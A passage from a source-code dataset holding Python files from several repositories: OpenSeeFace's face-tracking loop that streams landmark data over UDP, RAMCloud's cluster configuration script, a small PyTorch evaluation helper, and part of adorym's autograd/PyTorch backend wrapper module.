/ float(fps)\n repeat = args.repeat_video != 0 and type(input_reader.reader) == VideoReader\n need_reinit = 0\n failures = 0\n source_name = input_reader.name\n while repeat or input_reader.is_open():\n if not input_reader.is_open() or need_reinit == 1:\n input_reader = InputReader(args.capture, args.raw_rgb, args.width, args.height, fps, use_dshowcapture=use_dshowcapture_flag, dcap=dcap)\n if input_reader.name != source_name:\n print(f\"Failed to reinitialize camera and got {input_reader.name} instead of {source_name}.\")\n sys.exit(1)\n need_reinit = 2\n time.sleep(0.02)\n continue\n if not input_reader.is_ready():\n time.sleep(0.02)\n continue\n\n ret, frame = input_reader.read()\n if ret and args.mirror_input:\n frame = cv2.flip(frame, 1)\n if not ret:\n if repeat:\n if need_reinit == 0:\n need_reinit = 1\n continue\n elif is_camera:\n attempt += 1\n if attempt > 30:\n break\n else:\n time.sleep(0.02)\n if attempt == 3:\n need_reinit = 1\n continue\n else:\n break;\n\n attempt = 0\n need_reinit = 0\n frame_count += 1\n now = time.time()\n\n if first:\n first = False\n height, width, channels = frame.shape\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n tracker = Tracker(width, height, threshold=args.threshold, max_threads=args.max_threads, max_faces=args.faces, discard_after=args.discard_after, scan_every=args.scan_every, silent=False if args.silent == 0 else True, model_type=args.model, model_dir=args.model_dir, no_gaze=False if args.gaze_tracking != 0 and args.model != -1 else True, detection_threshold=args.detection_threshold, use_retinaface=args.scan_retinaface, max_feature_updates=args.max_feature_updates, static_model=True if args.no_3d_adapt == 1 else False, try_hard=args.try_hard == 1)\n if args.video_out is not None:\n out = cv2.VideoWriter(args.video_out, cv2.VideoWriter_fourcc('F','F','V','1'), args.video_fps, (width * args.video_scale, height * args.video_scale))\n\n try:\n inference_start = time.perf_counter()\n faces = tracker.predict(frame)\n if len(faces) > 0:\n inference_time = (time.perf_counter() - inference_start)\n total_tracking_time += inference_time\n tracking_time += inference_time / len(faces)\n tracking_frames += 1\n packet = bytearray()\n detected = False\n for face_num, f in enumerate(faces):\n f = copy.copy(f)\n f.id += args.face_id_offset\n if f.eye_blink is None:\n f.eye_blink = [1, 1]\n right_state = \"O\" if f.eye_blink[0] > 0.30 else \"-\"\n left_state = \"O\" if f.eye_blink[1] > 0.30 else \"-\"\n if args.silent == 0:\n print(f\"Confidence[{f.id}]: {f.conf:.4f} / 3D fitting error: {f.pnp_error:.4f} / Eyes: {left_state}, {right_state}\")\n detected = True\n if not f.success:\n pts_3d = np.zeros((70, 3), np.float32)\n packet.extend(bytearray(struct.pack(\"d\", now)))\n packet.extend(bytearray(struct.pack(\"i\", f.id)))\n packet.extend(bytearray(struct.pack(\"f\", width)))\n packet.extend(bytearray(struct.pack(\"f\", height)))\n packet.extend(bytearray(struct.pack(\"f\", f.eye_blink[0])))\n packet.extend(bytearray(struct.pack(\"f\", f.eye_blink[1])))\n packet.extend(bytearray(struct.pack(\"B\", 1 if f.success else 0)))\n packet.extend(bytearray(struct.pack(\"f\", f.pnp_error)))\n packet.extend(bytearray(struct.pack(\"f\", f.quaternion[0])))\n packet.extend(bytearray(struct.pack(\"f\", f.quaternion[1])))\n packet.extend(bytearray(struct.pack(\"f\", f.quaternion[2])))\n packet.extend(bytearray(struct.pack(\"f\", f.quaternion[3])))\n packet.extend(bytearray(struct.pack(\"f\", f.euler[0])))\n packet.extend(bytearray(struct.pack(\"f\", 
f.euler[1])))\n packet.extend(bytearray(struct.pack(\"f\", f.euler[2])))\n packet.extend(bytearray(struct.pack(\"f\", f.translation[0])))\n packet.extend(bytearray(struct.pack(\"f\", f.translation[1])))\n packet.extend(bytearray(struct.pack(\"f\", f.translation[2])))\n if log is not None:\n log.write(f\"{frame_count},{now},{width},{height},{fps},{face_num},{f.id},{f.eye_blink[0]},{f.eye_blink[1]},{f.conf},{f.success},{f.pnp_error},{f.quaternion[0]},{f.quaternion[1]},{f.quaternion[2]},{f.quaternion[3]},{f.euler[0]},{f.euler[1]},{f.euler[2]},{f.rotation[0]},{f.rotation[1]},{f.rotation[2]},{f.translation[0]},{f.translation[1]},{f.translation[2]}\")\n for (x,y,c) in f.lms:\n packet.extend(bytearray(struct.pack(\"f\", c)))\n if args.visualize > 1:\n frame = cv2.putText(frame, str(f.id), (int(f.bbox[0]), int(f.bbox[1])), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (255,0,255))\n if args.visualize > 2:\n frame = cv2.putText(frame, f\"{f.conf:.4f}\", (int(f.bbox[0] + 18), int(f.bbox[1] - 6)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255))\n for pt_num, (x,y,c) in enumerate(f.lms):\n packet.extend(bytearray(struct.pack(\"f\", y)))\n packet.extend(bytearray(struct.pack(\"f\", x)))\n if log is not None:\n log.write(f\",{y},{x},{c}\")\n if pt_num == 66 and (f.eye_blink[0] < 0.30 or c < 0.20):\n continue\n if pt_num == 67 and (f.eye_blink[1] < 0.30 or c < 0.20):\n continue\n x = int(x + 0.5)\n y = int(y + 0.5)\n if args.visualize != 0 or out is not None:\n if args.visualize > 3:\n frame = cv2.putText(frame, str(pt_num), (int(y), int(x)), cv2.FONT_HERSHEY_SIMPLEX, 0.25, (255,255,0))\n color = (0, 255, 0)\n if pt_num >= 66:\n color = (255, 255, 0)\n if not (x < 0 or y < 0 or x >= height or y >= width):\n cv2.circle(frame, (y, x), 1, color, -1)\n if args.pnp_points != 0 and (args.visualize != 0 or out is not None) and f.rotation is not None:\n if args.pnp_points > 1:\n projected = cv2.projectPoints(f.face_3d[0:66], f.rotation, f.translation, tracker.camera, tracker.dist_coeffs)\n else:\n projected = cv2.projectPoints(f.contour, f.rotation, f.translation, tracker.camera, tracker.dist_coeffs)\n for [(x,y)] in projected[0]:\n x = int(x + 0.5)\n y = int(y + 0.5)\n if not (x < 0 or y < 0 or x >= height or y >= width):\n frame[int(x), int(y)] = (0, 255, 255)\n x += 1\n if not (x < 0 or y < 0 or x >= height or y >= width):\n frame[int(x), int(y)] = (0, 255, 255)\n y += 1\n if not (x < 0 or y < 0 or x >= height or y >= width):\n frame[int(x), int(y)] = (0, 255, 255)\n x -= 1\n if not (x < 0 or y < 0 or x >= height or y >= width):\n frame[int(x), int(y)] = (0, 255, 255)\n for (x,y,z) in f.pts_3d:\n packet.extend(bytearray(struct.pack(\"f\", x)))\n packet.extend(bytearray(struct.pack(\"f\", -y)))\n packet.extend(bytearray(struct.pack(\"f\", -z)))\n if log is not None:\n log.write(f\",{x},{-y},{-z}\")\n if f.current_features is None:\n f.current_features = {}\n for feature in features:\n if not feature in f.current_features:\n f.current_features[feature] = 0\n packet.extend(bytearray(struct.pack(\"f\", f.current_features[feature])))\n if log is not None:\n log.write(f\",{f.current_features[feature]}\")\n if log is not None:\n log.write(\"\\r\\n\")\n log.flush()\n\n if detected and len(faces) < 40:\n sock.sendto(packet, (target_ip, target_port))\n\n if out is not None:\n video_frame = frame\n if args.video_scale != 1:\n video_frame = cv2.resize(frame, (width * args.video_scale, height * args.video_scale), interpolation=cv2.INTER_NEAREST)\n out.write(video_frame)\n if args.video_scale != 1:\n del video_frame\n\n if args.visualize != 
0:\n cv2.imshow('OpenSeeFace Visualization', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n if args.dump_points != \"\" and faces is not None and len(faces) > 0:\n np.set_printoptions(threshold=sys.maxsize, precision=15)\n pairs = [\n (0, 16),\n (1, 15),\n (2, 14),\n (3, 13),\n (4, 12),\n (5, 11),\n (6, 10),\n (7, 9),\n (17, 26),\n (18, 25),\n (19, 24),\n (20, 23),\n (21, 22),\n (31, 35),\n (32, 34),\n (36, 45),\n (37, 44),\n (38, 43),\n (39, 42),\n (40, 47),\n (41, 46),\n (48, 52),\n (49, 51),\n (56, 54),\n (57, 53),\n (58, 62),\n (59, 61),\n (65, 63)\n ]\n points = copy.copy(faces[0].face_3d)\n for a, b in pairs:\n x = (points[a, 0] - points[b, 0]) / 2.0\n y = (points[a, 1] + points[b, 1]) / 2.0\n z = (points[a, 2] + points[b, 2]) / 2.0\n points[a, 0] = x\n points[b, 0] = -x\n points[[a, b], 1] = y\n points[[a, b], 2] = z\n points[[8, 27, 28, 29, 33, 50, 55, 60, 64], 0] = 0.0\n points[30, :] = 0.0\n with open(args.dump_points, \"w\") as fh:\n fh.write(repr(points))\n break\n failures = 0\n except Exception as e:\n if e.__class__ == KeyboardInterrupt:\n if args.silent == 0:\n print(\"Quitting\")\n break\n traceback.print_exc()\n failures += 1\n if failures > 30:\n break\n\n collected = False\n del frame\n\n duration = time.perf_counter() - frame_time\n while duration < target_duration:\n if not collected:\n gc.collect()\n collected = True\n duration = time.perf_counter() - frame_time\n sleep_time = target_duration - duration\n if sleep_time > 0:\n time.sleep(sleep_time)\n duration = time.perf_counter() - frame_time\n frame_time = time.perf_counter()\nexcept KeyboardInterrupt:\n if args.silent == 0:\n print(\"Quitting\")\n\ninput_reader.close()\nif out is not None:\n out.release()\ncv2.destroyAllWindows()\n\nif args.silent == 0 and tracking_frames > 0:\n average_tracking_time = 1000 * tracking_time / tracking_frames\n print(f\"Average tracking time per detected face: {average_tracking_time:.2f} ms\")\n print(f\"Tracking time: {total_tracking_time:.3f} s\\nFrames: {tracking_frames}\")\n","repo_name":"emilianavt/OpenSeeFace","sub_path":"facetracker.py","file_name":"facetracker.py","file_ext":"py","file_size_in_byte":25543,"program_lang":"python","lang":"en","doc_type":"code","stars":1219,"dataset":"github-code","pt":"60"} +{"seq_id":"32503957424","text":"from common import captureSh\nimport commands\nimport os\nimport re\nimport subprocess\nimport sys\n\n__all__ = ['coordinator_port', 'default_disk1','default_disk2', 'git_branch',\n 'git_ref', 'git_diff', 'obj_dir', 'obj_path', 'scripts_path',\n 'second_backup_port', 'server_port', 'top_path', 'getHosts']\n\n# git_branch is the name of the current git branch, which is used\n# for purposes such as computing objDir.\ntry:\n git_branch = re.search('^refs/heads/(.*)$',\n captureSh('git symbolic-ref -q HEAD 2>/dev/null'))\nexcept subprocess.CalledProcessError:\n git_branch = None\n obj_dir = 'obj'\nelse:\n git_branch = git_branch.group(1)\n obj_dir = 'obj.%s' % git_branch\n\n# git_ref is the id of the commit at the HEAD of the current branch.\ntry:\n git_ref = captureSh('git rev-parse HEAD 2>/dev/null')\nexcept subprocess.CalledProcessError:\n git_ref = '{{unknown commit}}'\n\n# git_diff is None if the working directory and index are clean, otherwise\n# it is a string containing the unified diff of the uncommitted changes.\ntry:\n git_diff = captureSh('git diff HEAD 2>/dev/null')\n if git_diff == '':\n git_diff = None\nexcept subprocess.CalledProcessError:\n git_diff = '{{using unknown diff against commit}}'\n\n# obj_dir is the name of the 
directory containing binaries for the current\n# git branch (it's just a single name such as \"obj.master\", not a full path)\nif git_branch == None:\n    obj_dir = 'obj'\nelse:\n    obj_dir = 'obj.%s' % git_branch\n\n# The full path name of the directory containing this script file.\nscripts_path = os.path.dirname(os.path.abspath(__file__))\n\n# The full pathname of the parent of scripts_path (the top-level directory\n# of a RAMCloud source tree).\ntop_path = os.path.abspath(scripts_path + '/..')\n\n# Add /usr/local/lib to LD_LIBRARY_PATH if it isn't already there (this was\n# needed for CentOS 5.5, but should probably be deleted now).\ntry:\n    ld_library_path = os.environ['LD_LIBRARY_PATH'].split(':')\nexcept KeyError:\n    ld_library_path = []\nif '/usr/local/lib' not in ld_library_path:\n    ld_library_path.insert(0, '/usr/local/lib')\nos.environ['LD_LIBRARY_PATH'] = ':'.join(ld_library_path)\n\n# Host on which old master is run for running recoveries.\n# Need not be a member of hosts\n# hosts = None\nold_master_host = ('rcmaster', '192.168.1.1', 81)\n\n# Full path to the directory containing RAMCloud executables.\nobj_path = '%s/%s' % (top_path, obj_dir)\n\n# Ports (for TCP, etc.) to use for each kind of server.\ncoordinator_port = 12246\nserver_port = 12247\nsecond_backup_port = 12248\n\n# Command-line argument specifying where the first backup on each\n# server should store the segment replicas.\ndefault_disk1 = '-f /dev/sda2'\n\n# Command-line argument specifying where the second backup should\n# store its segment replicas.\ndefault_disk2 = '-f /dev/sdb2'\n\n# Try to include local overrides.\ntry:\n    from localconfig import *\nexcept ImportError:\n    pass\n\n\n# Returns a list of the hosts available for servers or clients;\n# each entry consists of a name for the host (for ssh), an IP address\n# to use for creating service locators, and an id for generating\n# Ethernet addresses.\n#\n# By default, the function will return a list generated from servers\n# locked by the current user in rcres (a RAMCloud internal utility).\n# If rcres is not available, a custom list can be defined in\n# localconfig.py (see below and the wiki for additional instructions).\n# In the event that rcres is available and a custom list is defined,\n# the function will validate the custom list against rcres.\n#\n# Example for constructing a custom list in localconfig.py:\n# hosts = []\n# for i in range(1, 61):\n#     hosts.append(('rc%02d' % i,\n#                   '192.168.1.%d' % (100 + i),\n#                   i))\n\ndef getHosts():\n    # Find servers locked by user via rcres\n    rcresOutput = commands.getoutput('rcres ls -l | grep \"$(whoami)\" | cut -c13-16 | grep \"rc[0-9]\" | cut -c3-4')\n    rcresFailed = re.match(\".*not found.*\", rcresOutput)\n\n    # If hosts overridden in localconfig.py, check that all servers are locked\n    if 'hosts' in globals():\n        requestedUnlockedHosts = []\n        for host in hosts:\n            if str(\"%02d\" % host[2]) not in rcresOutput.split():\n                requestedUnlockedHosts.append(host[0])\n\n        if not rcresFailed and len(requestedUnlockedHosts) > 0:\n            raise Exception(\"Manually defined hosts list in localconfig.py includes the \"\n                            \"following servers not locked by user in rcres:\\r\\n\\t%s\" % requestedUnlockedHosts)\n\n        return hosts\n\n    # hosts has not been overridden, check that rcres has some servers for us\n    else:\n        if rcresFailed:\n            raise Exception(\"config.py could not invoke rcres (%s);\\r\\n\"\n                            \"\\tplease specify a custom hosts list in scripts/localconfig.py\" % rcresOutput)\n\n        if len(rcresOutput) == 0:\n            raise Exception(\"config.py found 0 rcXX servers locked in rcres;\\r\\n\"\n                            \"\\tcheck your locks or specify a custom hosts list in scripts/localconfig.py\")\n\n        # Everything checks out, build list\n        serverList = []\n        for hostNum in rcresOutput.split():\n            i = int(hostNum)\n            serverList.append(('rc%02d' % i,\n                               '192.168.1.%d' % (100 + i),\n                               i))\n        return serverList\n
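\n# Illustrative usage from another script (assumes the scripts directory is on sys.path):\n#   from config import getHosts\n#   name, ip, host_id = getHosts()[0]\n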
\nif __name__ == '__main__':\n    print('\n'.join([s[0] for s in getHosts()]))\n","repo_name":"alexandermerritt/ramcloud","sub_path":"scripts/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"12547372042","text":"import torch\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\ndef test_predictions(model, X_test):\n    predictions=[]\n    with torch.no_grad():\n        for i, data in enumerate(X_test):\n            y_pred=model(data)\n            predictions.append(y_pred.argmax().item())\n    return predictions\n\n# Confusion Matrix (rows of cm are the actual classes, columns the predicted ones)\ndef con_matrix(y_test, predictions):\n    cm = confusion_matrix(y_test,predictions)\n    plt.figure(figsize=(10,6))\n    sns.heatmap(cm,annot=True)\n    plt.xlabel('Predicted Values')\n    plt.ylabel('Actual Values')\n    plt.show()\n\ndef acc_score(y_test, predictions):\n    return accuracy_score(y_test,predictions)\n","repo_name":"shaakirag/Project.ANN_DataVisualization","sub_path":"prediction_ann/model_ann/ann_test.py","file_name":"ann_test.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4734958378","text":"import warnings\nimport os\nimport gc\nimport numpy as np\nimport scipy\nimport scipy.signal\n\nimport adorym.global_settings as global_settings\n\nengine_dict = {}\ntry:\n    import autograd.numpy as anp\n    import autograd as ag\n    engine_dict['autograd'] = anp\n    flag_autograd_avail = True\nexcept:\n    warnings.warn('Autograd backend is not available.')\n    flag_autograd_avail = False\ntry:\n    import torch as tc\n    import torch.autograd as tag\n    engine_dict['pytorch'] = tc\n    flag_pytorch_avail = True\nexcept:\n    warnings.warn('PyTorch backend is not available.')\n    flag_pytorch_avail = False\n\n\nfunc_mapping_dict = {'zeros': {'autograd': 'zeros', 'tensorflow': 'zeros', 'pytorch': 'zeros', 'numpy': 'zeros'},\n                     'ones': {'autograd': 'ones', 'tensorflow': 'ones', 'pytorch': 'ones', 'numpy': 'ones'},\n                     'zeros_like': {'autograd': 'zeros_like', 'tensorflow': 'zeros_like', 'pytorch': 'zeros_like', 'numpy': 'zeros_like'},\n                     'ones_like': {'autograd': 'ones_like', 'tensorflow': 'ones_like', 'pytorch': 'ones_like', 'numpy': 'ones_like'},\n                     'stack': {'autograd': 'stack', 'tensorflow': 'stack', 'pytorch': 'stack', 'numpy': 'stack'},\n                     'concatenate': {'autograd': 'concatenate','tensorflow': 'cat', 'pytorch': 'cat', 'numpy': 'concatenate'},\n                     'exp': {'autograd': 'exp', 'tensorflow': 'exp', 'pytorch': 'exp'},\n                     'log': {'autograd': 'log', 'tensorflow': 'log', 'pytorch': 'log'},\n                     'round': {'autograd': 'round', 'tensorflow': 'round', 'pytorch': 'round'},\n                     'clip': {'autograd': 'clip', 'tensorflow': 'clip', 'pytorch': 'clamp'},\n                     'reshape': {'autograd': 'reshape', 'tensorflow': 'reshape', 'pytorch': 'reshape'},\n                     'floor': {'autograd': 'floor', 'tensorflow': 'floor', 'pytorch': 'floor'},\n                     'ceil': {'autograd': 'ceil', 'tensorflow': 'ceil', 'pytorch': 'ceil'},\n                     'sqrt': {'autograd': 'sqrt', 'tensorflow': 'sqrt', 'pytorch': 'sqrt'},\n                     'real': {'autograd': 'real', 'tensorflow': 'real', 'pytorch': 'real'},\n                     'imag': {'autograd': 'imag', 
'tensorflow': 'imag', 'pytorch': 'imag'},\n 'sin': {'autograd': 'sin', 'tensorflow': 'sin', 'pytorch': 'sin', 'numpy': 'sin'},\n 'cos': {'autograd': 'cos', 'tensorflow': 'cos', 'pytorch': 'cos', 'numpy': 'cos'},\n 'abs': {'autograd': 'abs', 'tensorflow': 'abs', 'pytorch': 'abs', 'numpy': 'abs'},\n 'sum': {'autograd': 'sum', 'tensorflow': 'reduce_sum', 'pytorch': 'sum'},\n 'prod': {'autograd': 'prod', 'tensorflow': 'prod', 'pytorch': 'prod'},\n 'arctan2': {'autograd': 'arctan2', 'tensorflow': 'atan2', 'pytorch': 'atan2'},\n 'nonzero': {'autograd': 'nonzero', 'tensorflow': 'nonzero', 'pytorch': 'nonzero'},\n 'sign': {'autograd': 'sign', 'tensorflow': 'sign', 'pytorch': 'sign', 'numpy': 'sign'},\n 'argmax': {'autograd': 'argmax', 'tensorflow': 'argmax', 'pytorch': 'argmax', 'numpy': 'argmax'},\n 'tensordot': {'autograd': 'tensordot', 'tensorflow': 'tensordot', 'pytorch': 'tensordot', 'numpy': 'tensordot'},\n }\n\ndtype_mapping_dict = {'float32': {'autograd': 'float32', 'tensorflow': 'float32', 'pytorch': 'float', 'numpy': 'float32'},\n 'float64': {'autograd': 'float64', 'tensorflow': 'float64', 'pytorch': 'double', 'numpy': 'float64'},\n 'float16': {'autograd': 'float16', 'tensorflow': 'float16', 'pytorch': 'half', 'numpy': 'float16'},\n 'int8': {'autograd': 'int8', 'tensorflow': 'int8', 'pytorch': 'int8', 'numpy': 'int8'},\n 'int16': {'autograd': 'int16', 'tensorflow': 'int16', 'pytorch': 'short', 'numpy': 'int16'},\n 'int32': {'autograd': 'int32', 'tensorflow': 'int32', 'pytorch': 'int', 'numpy': 'int32'},\n 'int64': {'autograd': 'int64', 'tensorflow': 'int64', 'pytorch': 'long', 'numpy': 'int64'},\n 'bool': {'autograd': 'bool', 'tensorflow': 'bool', 'pytorch': 'bool', 'numpy': 'bool'},\n }\n\nif flag_pytorch_avail:\n try:\n pytorch_dtype_query_mapping_dict = {tc.float32: 'float32',\n tc.float64: 'float64',\n 'float32': 'float32',\n 'float64': 'float64',\n 'single': 'float32',\n 'double': 'float64'}\n except:\n pass\n\n\ndef set_bn(f):\n def func(*args, override_backend=None, **kwargs):\n if 'backend' in kwargs.keys():\n # If \"backend\" in the wrapper function is specified by user, it overrides the\n # \"override_backend\" argument in the decorator.\n pass\n else:\n # If \"backend\" in the wrapper function is not specified, check if \"override_backend\"\n # argument in the decorator.\n # If so, use its value for the wrappers \"backend\" argument.\n # If not, use global setting.\n kwargs['backend'] = override_backend if override_backend is not None else global_settings.backend\n return f(*args, **kwargs)\n return func\n\n# _____________\n# |Flow control|_____________________________________________________________\n\nclass EmptyWith(object):\n def __init__(self):\n pass\n \n def __enter__(self):\n pass\n \n def __exit__(self, exc_type, exc_value, tb):\n pass\n\n@set_bn\ndef create_variable(arr, dtype='float32', device=None, requires_grad=True, backend='autograd'):\n \"\"\"\n Create a variable wrapper.\n :param arr: Numpy array of the intial value.\n :param dtype: str; Data type.\n :param device: A device object from PyTorch, etc. 
Use None for CPU.\n \"\"\"\n args = {}\n if backend == 'autograd':\n if dtype is not None:\n args['dtype'] = dtype_mapping_dict[dtype]['autograd']\n var = anp.array(arr, **args)\n elif backend == 'pytorch':\n if dtype is not None:\n args['dtype'] = getattr(engine_dict['pytorch'], dtype_mapping_dict[dtype]['pytorch'])\n if device is not None:\n args['device'] = device\n args['requires_grad'] = requires_grad\n var = tc.tensor(arr, **args)\n return var\n\n\n@set_bn\ndef create_constant(arr, dtype='float32', device=None, backend='autograd'):\n \"\"\"\n Create a variable wrapper.\n :param arr: Numpy array of the intial value.\n :param dtype: str; Data type.\n :param device: A device object from PyTorch, etc. Use None for CPU.\n \"\"\"\n args = {}\n if backend == 'autograd':\n if dtype is not None:\n args['dtype'] = dtype_mapping_dict[dtype]['autograd']\n var = np.array(arr, **args)\n elif backend == 'pytorch':\n if dtype is not None:\n args['dtype'] = getattr(engine_dict['pytorch'], dtype_mapping_dict[dtype]['pytorch'])\n if device is not None:\n args['device'] = device\n args['requires_grad'] = False\n var = tc.tensor(arr, **args)\n else:\n if dtype is not None:\n args['dtype'] = dtype_mapping_dict[dtype]['autograd']\n var = np.array(arr, **args)\n return var\n\n\n@set_bn\ndef to_numpy(var, backend='autograd'):\n if isinstance(var, np.ndarray):\n return var\n elif isinstance(var, np.float64):\n return var\n else:\n if backend == 'autograd':\n return var._value\n elif backend == 'pytorch':\n if var.device.type == 'cpu':\n return var.data.numpy()\n else:\n return var.cpu().data.numpy()\n\n\n@set_bn\ndef to_cpu(var, backend='autograd'):\n if isinstance(var, np.ndarray):\n return var\n elif isinstance(var, np.float64):\n return var\n else:\n if backend == 'autograd':\n return var\n elif backend == 'pytorch':\n if var.device.type == 'cpu':\n return var\n else:\n return var.cpu()\n\n\n@set_bn\ndef to_gpu(var, device='cuda:0', backend='autograd'):\n if isinstance(var, np.ndarray):\n return var\n elif isinstance(var, np.float64):\n return var\n else:\n if backend == 'autograd':\n return var\n elif backend == 'pytorch':\n if var.device.type == 'cuda':\n return var\n else:\n return var.cuda(device=device)\n\n\n@set_bn\ndef get_device(index=None, backend='autograd'):\n \"\"\"\n Get device object.\n :param index: index of GPU. Set to None if the tensor is kept on host.\n \"\"\"\n if backend == 'autograd': return None\n elif backend == 'pytorch':\n if index is None: return None\n else:\n return tc.device('cuda:{}'.format(index))\n\n\n@set_bn\ndef get_var_device(var, backend='autograd'):\n if backend == 'autograd':\n return None\n elif backend == 'pytorch':\n return var.device\n\n\n@set_bn\ndef get_var_device_type(var, backend='autograd'):\n if backend == 'autograd':\n return 'cpu'\n elif backend == 'pytorch':\n return var.device.type\n\n\n@set_bn\ndef set_device(device, backend='autograd'):\n \"\"\"\n Set device object. Not useful is backend is Autograd.\n :param device: Device object. Set to None if the tensor is kept on host.\n \"\"\"\n if backend == 'autograd':\n return None\n elif backend == 'pytorch':\n try:\n tc.cuda.set_device(device)\n except:\n pass\n\n\n@set_bn\ndef prepare_loss_node(loss, opt_args_ls=None, backend='autograd'):\n if backend == 'autograd':\n return ag.grad(loss, opt_args_ls)\n elif backend == 'pytorch':\n return loss\n\n\n@set_bn\ndef get_gradients(loss_node, opt_args_ls=None, backend='autograd', **kwargs):\n \"\"\"\n Get gradient.\n\n :param loss_node: Callable. 
A function which, given arguments in kwargs, returns the loss.\n :param opt_args_ls: List of Int. Indices of optimizable variables in the loss function's argument list.\n :param backend: Backend.\n :param kwargs: Keyword arguments of the loss function.\n :return: A list of gradients.\n \"\"\"\n if backend == 'autograd':\n # For Autograd, loss_node is the grad function that takes the loss function arguments and\n # returns the gradients.\n return loss_node(*list(kwargs.values()))\n elif backend == 'pytorch':\n # For PyTorch, loss_node is the loss function itself.\n l = loss_node(**kwargs)\n kwargs_ls = list(kwargs.values())\n dx_ls = []\n for i, node in enumerate(kwargs_ls):\n if i in opt_args_ls: dx_ls.append(node)\n grads = tag.grad(l, dx_ls, retain_graph=True, create_graph=False, allow_unused=False)\n # grads = []\n # l.backward(retain_graph=True)\n # for n in dx_ls:\n # print(n.grad)\n # grads.append(n.grad)\n l.detach()\n del l\n\n return grads\n\n\n@set_bn\ndef vjp(func, x, backend='autograd'):\n \"\"\"\n Returns a constructor that would generate a function that computes the VJP between its argument and the\n Jacobian of func.\n :param func: Function handle of loss function.\n :param x: List. A list of all arguments to func. The order of arguments must match.\n :return: The returned constructor receives the input of the differentiated function as input, and the function it returns\n receives the (adjoint) vector as input.\n \"\"\"\n if backend == 'autograd':\n return ag.make_vjp(func, x)\n elif backend == 'pytorch':\n raise NotImplementedError('VJP for Pytorch backend is not implemented yet.')\n\n\n@set_bn\ndef jvp(func, x, backend='autograd'):\n \"\"\"\n Returns a constructor that would generate a function that computes the JVP between its argument and the\n Jacobian of func.\n :param func: Function handle of loss function.\n :param x: List. A list of all arguments to func. The order of arguments must match.\n :return: The returned constructor receives the input of the differentiated function as input, and the function it returns\n receives the (adjoint) vector as input.\n \"\"\"\n if backend == 'autograd':\n return ag.differential_operators.make_jvp_reversemode(func, x)\n elif backend == 'pytorch':\n raise NotImplementedError('VJP for Pytorch backend is not implemented yet.')\n\n\n@set_bn\ndef hvp(func, x, backend='autograd'):\n \"\"\"\n Returns a constructor that would generate a function that computes the HVP between its argument and the\n Hessian of func.\n :param func: Function handle of loss function.\n :param x: List. A list of all arguments to func. 
The order of arguments must match.\n :return: The returned constructor receives the input of the differentiated function as input, and the function it returns\n receives the (adjoint) vector as input.\n \"\"\"\n if backend == 'autograd':\n return ag.differential_operators.make_hvp(func, x)\n elif backend == 'pytorch':\n raise NotImplementedError('VJP for Pytorch backend is not implemented yet.')\n\n\n@set_bn\ndef get_gpu_memory_usage_mb(backend='autograd'):\n if backend == 'autograd':\n return 0\n elif backend == 'pytorch':\n return tc.cuda.memory_allocated() / 1024 ** 2\n\n\n@set_bn\ndef get_gpu_memory_cache_mb(backend='autograd'):\n if backend == 'autograd':\n return 0\n elif backend == 'pytorch':\n return tc.cuda.memory_cached() / 1024 ** 2\n\n\n@set_bn\ndef get_peak_gpu_memory_usage_mb(backend='autograd'):\n if backend == 'autograd':\n return 0\n elif backend == 'pytorch':\n return tc.cuda.max_memory_allocated() / 1024 ** 2\n\n@set_bn\ndef collect_gpu_garbage(backend='autograd'):\n if backend == 'autograd':\n pass\n elif backend == 'pytorch':\n tc.cuda.empty_cache()\n\n@set_bn\ndef get_allocated_tensors(backend='autograd'):\n\n def _getr(slist, olist, seen):\n for e in slist:\n if id(e) in seen:\n continue\n seen[id(e)] = None\n olist.append(e)\n tl = gc.get_referents(e)\n if tl:\n _getr(tl, olist, seen)\n\n def get_all_objects():\n \"\"\"Return a list of all live Python\n objects, not including the list itself.\"\"\"\n gcl = gc.get_objects()\n olist = []\n seen = {}\n # Just in case:\n seen[id(gcl)] = None\n seen[id(olist)] = None\n seen[id(seen)] = None\n # _getr does the real work.\n _getr(gcl, olist, seen)\n return olist\n\n if backend == 'pytorch':\n objects = get_all_objects()\n for obj in objects:\n try:\n if tc.is_tensor(obj) or (hasattr(obj, 'data') and tc.is_tensor(obj.data)):\n print(type(obj), obj.shape, obj.device)\n except:\n pass\n\n@set_bn\ndef no_grad(backend='autograd'):\n if backend == 'pytorch':\n return tc.no_grad()\n else:\n return EmptyWith()\n\n@set_bn\ndef detach(var, backend='autograd'):\n if backend == 'pytorch':\n var.requires_grad_(False)\n return var\n else:\n return var\n\n@set_bn\ndef reattach(var, backend='autograd'):\n if backend == 'pytorch':\n var.requires_grad_()\n return var\n else:\n return var\n\n# ________________\n# |Maths functions|_____________________________________________________________\n\n@set_bn\ndef get_dtype(arr, backend='autograd'):\n \"\"\"\n Get dtype of array in standard string format ('float32', 'float64' etc.)\n\n :param arr: Tensor.\n :return: Dtype string.\n \"\"\"\n if backend == 'pytorch':\n return pytorch_dtype_query_mapping_dict[arr.dtype]\n elif backend == 'autograd':\n return str(arr.dtype)\n\n@set_bn\ndef zeros(shape, dtype=None, device=None, requires_grad=True, backend='autograd'):\n kwargs = {}\n if dtype is not None: kwargs['dtype'] = dtype\n func = getattr(engine_dict[backend], func_mapping_dict['zeros'][backend])\n if backend == 'pytorch':\n if dtype is not None: kwargs['dtype'] = getattr(engine_dict['pytorch'], dtype_mapping_dict[dtype]['pytorch'])\n arr = func(shape, device=device, requires_grad=requires_grad, **kwargs)\n else:\n arr = func(shape, **kwargs)\n return arr\n\n\n@set_bn\ndef ones(shape, dtype=None, device=None, requires_grad=True, backend='autograd'):\n kwargs = {}\n if dtype is not None: kwargs['dtype'] = dtype\n func = getattr(engine_dict[backend], func_mapping_dict['ones'][backend])\n if backend == 'pytorch':\n if dtype is not None: kwargs['dtype'] = getattr(engine_dict['pytorch'], 
